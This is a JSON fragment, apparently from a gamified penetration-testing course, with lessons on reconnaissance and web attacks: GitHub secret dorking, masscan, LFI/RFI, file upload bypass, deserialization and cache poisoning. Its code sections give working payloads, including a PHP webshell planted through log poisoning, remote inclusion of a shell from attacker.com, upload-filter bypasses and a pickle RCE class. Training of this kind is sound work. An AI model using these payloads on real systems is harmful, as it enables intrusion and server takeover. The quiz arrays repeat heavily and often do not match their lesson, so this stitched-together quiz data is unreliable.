ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"recon-github-dorking","cat":"Reconnaissance","title":"GitHub Dorking for Secrets","diff":1,"xp":100,"intro":"Find leaked API keys, passwords, and tokens in public repos.","sections":[{"type":"text","content":"GitHub's code search reveals accidentally committed secrets. Search for API keys, passwords, and internal URLs in public repositories."},{"type":"code","lang":"bash","content":"# GitHub search queries\norg:targetcompany password\norg:targetcompany 'AKIA'  # AWS keys\norg:targetcompany 'sk-ant-'  # Anthropic keys\nfilename:.env DB_PASSWORD\nfilename:wp-config.php\n# Automated: truffleHog\ntrufflehog github --org=targetcompany"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"GitHub dorking is effective because developers...","opts":["Use weak passwords","Accidentally commit secrets to public repos","Don't use GitHub","Share code privately"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-whois","cat":"Reconnaissance","title":"WHOIS Intelligence","diff":1,"xp":50,"intro":"Domain registration data reveals names, emails, and infrastructure.","sections":[{"type":"text","content":"WHOIS shows registrant info, nameservers, and dates. Privacy protection hides details, but historical WHOIS archives often have the original data."},{"type":"code","lang":"bash","content":"whois example.com\n# Historical WHOIS\n# whoishistory.com, domaintools.com\n# Reverse WHOIS (find all domains by same registrant)\n# 'registrant email: admin@company.com'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"WHOIS reveals...","opts":["Website content","Domain registration details","Server passwords","SSL certificates"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-masscan","cat":"Reconnaissance","title":"Masscan \u2014 Internet-Scale Port Scanning","diff":2,"xp":150,"intro":"Scan the entire internet in under 6 minutes.","sections":[{"type":"text","content":"Masscan sends raw SYN packets at millions per second. Use it for broad discovery, then nmap for detailed service detection on open ports."},{"type":"code","lang":"bash","content":"# Scan a /16 for common ports\nmasscan 10.10.0.0/16 -p80,443,22,445,3389 --rate=10000\n# Full port scan of a target\nmasscan 10.10.10.5 -p1-65535 --rate=1000\n# Output to nmap-compatible format\nmasscan 10.10.0.0/24 -p1-65535 --rate=5000 -oL results.txt\n# Then detailed scan\nnmap -sV -sC -p$(cat results.txt | awk '{print $3}' | sort -u | tr '\\n' ',') 10.10.10.5"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Masscan is faster than nmap because it...","opts":["Uses UDP","Sends raw SYN packets with a custom TCP stack","Has more features","Scans fewer ports"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-lfi-rfi","cat":"Web Application","title":"LFI / RFI (File Inclusion)","diff":1,"xp":100,"intro":"Include local or remote files through vulnerable parameters.","sections":[{"type":"text","content":"Local File Inclusion reads server files (../../etc/passwd). Remote File Inclusion loads your malicious file from an external URL."},{"type":"code","lang":"bash","content":"# LFI: read /etc/passwd\ncurl 'http://target.com/page.php?file=../../../../etc/passwd'\n# LFI with null byte (old PHP)\ncurl 'http://target.com/page.php?file=../../../../etc/passwd%00'\n# LFI to RCE via log poisoning\n# 1. Inject PHP in User-Agent\ncurl -A '<?php system($_GET[\"cmd\"]); ?>' http://target.com/\n# 2. Include the access log\ncurl 'http://target.com/page.php?file=/var/log/apache2/access.log&cmd=id'\n# RFI\ncurl 'http://target.com/page.php?file=http://attacker.com/shell.php'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"LFI path traversal uses...","opts":["SQL injection","../../ sequences to escape the web root","XSS payloads","Buffer overflow"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-file-upload","cat":"Web Application","title":"File Upload Attacks","diff":1,"xp":100,"intro":"Bypass upload filters to get a web shell on the server.","sections":[{"type":"text","content":"Upload restrictions (extension, MIME type, content) can often be bypassed: double extensions, null bytes, MIME spoofing, or magic bytes."},{"type":"code","lang":"bash","content":"# Bypass extension filter\nshell.php.jpg\nshell.pHp  # case variation\nshell.php%00.jpg  # null byte\nshell.php.  # trailing dot\n# Bypass content-type check\ncurl -F 'file=@shell.php;type=image/jpeg' http://target.com/upload\n# Bypass magic bytes: prepend GIF header\necho -e 'GIF89a\\n<?php system($_GET[\"cmd\"]); ?>' > shell.php.gif"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"A common way to bypass extension filtering is...","opts":["Encrypt the file","Use double extensions like shell.php.jpg","Compress the file","Change the filename to numbers"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-deserialization","cat":"Web Application","title":"Insecure Deserialization","diff":2,"xp":200,"intro":"Craft serialized objects that execute code when deserialized.","sections":[{"type":"text","content":"When an app deserializes untrusted data, an attacker crafts an object that triggers code execution through gadget chains in the classpath."},{"type":"code","lang":"bash","content":"# Java deserialization with ysoserial\njava -jar ysoserial.jar CommonsCollections1 'id' | base64\n# PHP deserialization\nO:4:\"User\":2:{s:4:\"name\";s:5:\"admin\";s:4:\"role\";s:5:\"admin\";}\n# Python pickle RCE\nimport pickle, os\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, ('id',))\npickle.dumps(Exploit())"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Java deserialization RCE uses...","opts":["SQL injection","Gadget chains in loaded libraries","Buffer overflow","XSS"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-cache-poisoning","cat":"Web Application","title":"Web Cache Poisoning","diff":3,"xp":250,"intro":"Poison the cache to serve malicious content to all visitors.","sections":[{"type":"text","content":"If unkeyed headers (X-Forwarded-Host, X-Original-URL) influence the response but aren't part of the cache key, inject malicious content for everyone."},{"type":"code","lang":"bash","content":"# Test for cache poisoning\ncurl -H 'X-Forwarded-Host: evil.com' https://target.com/\n# If the response reflects evil.com AND gets cached:\n# Every subsequent visitor gets the poisoned response\n# Common unkeyed inputs:\n# X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL\n# Vary header, Accept-Language, User-Agent"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cache poisoning works when a header...","opts":["Is encrypted","Affects the response but isn't in the cache key","Is too long","Contains SQL"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP 